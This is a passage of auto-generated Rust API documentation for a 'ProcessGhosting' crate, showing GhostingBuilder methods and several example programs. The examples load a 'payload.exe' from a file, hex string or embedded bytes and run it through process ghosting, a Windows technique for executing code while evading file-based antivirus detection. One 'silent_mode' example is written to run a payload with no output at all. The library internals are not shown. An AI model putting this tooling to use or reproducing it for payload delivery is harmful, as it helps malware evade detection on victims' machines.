124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn build(self) -> GhostingConfig
pub fn build(self) -> GhostingConfig
Build the configuration
Examples found in repository?
examples/from_hex.rs (line 42)
6fn main() {
7 init();
8
9 println!("[*] From Hex String Example\n");
10
11 // Example: Various hex formats supported
12 let hex_formats = [
13 ("Continuous", "4D5A90000300000004000000FFFF0000"),
14 ("Spaced", "4D 5A 90 00 03 00 00 00"),
15 ("C-style", "0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00"),
16 ("Escaped", "\\x4D\\x5A\\x90\\x00\\x03\\x00"),
17 ];
18
19 println!("[*] Supported hex formats:\n");
20
21 for (name, hex) in &hex_formats {
22 match parse_hex_string(hex) {
23 Ok(bytes) => {
24 println!(" {}: {} -> {:02X?}", name, hex, &bytes[..bytes.len().min(4)]);
25 }
26 Err(e) => {
27 println!(" {}: Error - {}", name, e);
28 }
29 }
30 }
31
32 println!();
33
34 // For actual execution, you would use a complete PE file in hex
35 // This is just a demonstration of the parsing
36
37 let sample_hex = "0x4D, 0x5A, 0x90, 0x00"; // MZ header start
38
39 match GhostingBuilder::from_hex_string(sample_hex) {
40 Ok(builder) => {
41 println!("[+] Successfully parsed hex string");
42 println!("[*] Payload size: {} bytes", builder.build().payload.len());
43
44 // Note: This would fail with just the header
45 // In real usage, provide complete PE bytes
46 // builder.x64().execute();
47 }
48 Err(e) => {
49 eprintln!("[-] Failed to parse: {}", e);
50 }
51 }
52}More examples
examples/full_demo.rs (line 83)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn execute(self) -> Result<(), String>
pub fn execute(self) -> Result<(), String>
Execute the ghosting operation directly
Examples found in repository?
examples/silent_mode.rs (line 21)
6fn main() {
7 // No init() call = no banner
8
9 let payload = match std::fs::read("payload.exe") {
10 Ok(p) => p,
11 Err(_) => {
12 // Silent failure - no output
13 std::process::exit(1);
14 }
15 };
16
17 // Silent execution - no output at all
18 let result = GhostingBuilder::new(&payload)
19 .x64()
20 .silent() // Disable all output
21 .execute();
22
23 // Exit with appropriate code
24 std::process::exit(if result.is_ok() { 0 } else { 1 });
25}More examples
examples/from_file.rs (line 28)
7fn main() {
8 init();
9
10 println!("[*] From File Example\n");
11
12 // Get file path from command line or use default
13 let args: Vec<String> = env::args().collect();
14 let file_path = if args.len() > 1 {
15 &args[1]
16 } else {
17 "payload.exe"
18 };
19
20 println!("[*] Loading payload from: {}", file_path);
21
22 // Use from_file builder method
23 match GhostingBuilder::from_file(file_path) {
24 Ok(builder) => {
25 let result = builder
26 .x64()
27 .with_logging()
28 .execute();
29
30 match result {
31 Ok(_) => println!("\n[+] Success!"),
32 Err(e) => eprintln!("\n[-] Failed: {}", e),
33 }
34 }
35 Err(e) => {
36 eprintln!("[-] Failed to load file: {}", e);
37 }
38 }
39}examples/basic_usage.rs (line 23)
6fn main() {
7 // Initialize library (prints banner)
8 init();
9
10 println!("[*] Basic Usage Example\n");
11
12 // Read payload from file
13 let payload_path = "payload.exe";
14
15 match std::fs::read(payload_path) {
16 Ok(payload) => {
17 println!("[+] Loaded payload: {} bytes", payload.len());
18
19 // Execute ghosting
20 let result = GhostingBuilder::new(&payload)
21 .x64() // Target x64 architecture
22 .with_logging() // Enable verbose output
23 .execute();
24
25 match result {
26 Ok(_) => println!("\n[+] Process ghosting completed successfully!"),
27 Err(e) => eprintln!("\n[-] Process ghosting failed: {}", e),
28 }
29 }
30 Err(e) => {
31 eprintln!("[-] Failed to read payload file '{}': {}", payload_path, e);
32 eprintln!(" Please provide a valid PE executable.");
33 }
34 }
35}examples/architecture_selection.rs (line 46)
7fn main() {
8 init();
9
10 println!("[*] Architecture Selection Example\n");
11
12 let args: Vec<String> = env::args().collect();
13
14 // Parse arguments
15 let (file_path, arch) = if args.len() >= 3 {
16 let arch = match args[2].to_lowercase().as_str() {
17 "x86" | "32" | "i386" => Architecture::X86,
18 "x64" | "64" | "amd64" => Architecture::X64,
19 _ => {
20 eprintln!("[-] Unknown architecture: {}", args[2]);
21 eprintln!(" Use: x86, x64, 32, or 64");
22 return;
23 }
24 };
25 (args[1].as_str(), arch)
26 } else if args.len() == 2 {
27 (args[1].as_str(), Architecture::X64) // Default to x64
28 } else {
29 println!("Usage: {} <payload.exe> [arch]", args[0]);
30 println!();
31 println!("Architectures:");
32 println!(" x86, 32, i386 - 32-bit");
33 println!(" x64, 64, amd64 - 64-bit (default)");
34 return;
35 };
36
37 println!("[*] File: {}", file_path);
38 println!("[*] Architecture: {}", arch);
39 println!();
40
41 match GhostingBuilder::from_file(file_path) {
42 Ok(builder) => {
43 let result = builder
44 .architecture(arch)
45 .with_logging()
46 .execute();
47
48 match result {
49 Ok(_) => println!("\n[+] Success!"),
50 Err(e) => eprintln!("\n[-] Failed: {}", e),
51 }
52 }
53 Err(e) => eprintln!("[-] Error: {}", e),
54 }
55}examples/error_handling.rs (line 30)
6fn main() {
7 init();
8
9 println!("[*] Error Handling Example\n");
10
11 // Test 1: Invalid file
12 println!("[Test 1] Loading non-existent file:");
13 match GhostingBuilder::from_file("nonexistent.exe") {
14 Ok(_) => println!(" Unexpected success"),
15 Err(e) => println!(" Expected error: {}", e),
16 }
17 println!();
18
19 // Test 2: Invalid hex string
20 println!("[Test 2] Parsing invalid hex:");
21 match parse_hex_string("ZZZZ") {
22 Ok(_) => println!(" Unexpected success"),
23 Err(e) => println!(" Expected error: {}", e),
24 }
25 println!();
26
27 // Test 3: Invalid PE (not MZ header)
28 println!("[Test 3] Executing invalid PE:");
29 let invalid_pe = vec![0x00, 0x00, 0x00, 0x00]; // Not MZ
30 match GhostingBuilder::new(&invalid_pe).x64().execute() {
31 Ok(_) => println!(" Unexpected success"),
32 Err(e) => println!(" Expected error: {}", e),
33 }
34 println!();
35
36 // Test 4: Empty payload
37 println!("[Test 4] Empty payload:");
38 match GhostingBuilder::new(&[]).x64().execute() {
39 Ok(_) => println!(" Unexpected success"),
40 Err(e) => println!(" Expected error: {}", e),
41 }
42 println!();
43
44 // Test 5: Truncated PE
45 println!("[Test 5] Truncated PE (only MZ header):");
46 let truncated_pe = vec![0x4D, 0x5A]; // Just MZ
47 match GhostingBuilder::new(&truncated_pe).x64().execute() {
48 Ok(_) => println!(" Unexpected success"),
49 Err(e) => println!(" Expected error: {}", e),
50 }
51 println!();
52
53 println!("[*] Error handling tests complete.");
54}Trait Implementations§
Source§impl Clone for GhostingBuilder
impl Clone for GhostingBuilder
Source§fn clone(&self) -> GhostingBuilder
fn clone(&self) -> GhostingBuilder
Returns a duplicate of the value. Read more
1.0.0 · Source§fn clone_from(&mut self, source: &Self)
fn clone_from(&mut self, source: &Self)
Performs copy-assignment from
source. Read moreAuto Trait Implementations§
impl Freeze for GhostingBuilder
impl RefUnwindSafe for GhostingBuilder
impl Send for GhostingBuilder
impl Sync for GhostingBuilder
impl Unpin for GhostingBuilder
impl UnwindSafe for GhostingBuilder
Blanket Implementations§
Source§impl<T> BorrowMut<T> for Twhere
T: ?Sized,
impl<T> BorrowMut<T> for Twhere
T: ?Sized,
Source§fn borrow_mut(&mut self) -> &mut T
fn borrow_mut(&mut self) -> &mut T
Mutably borrows from an owned value. Read more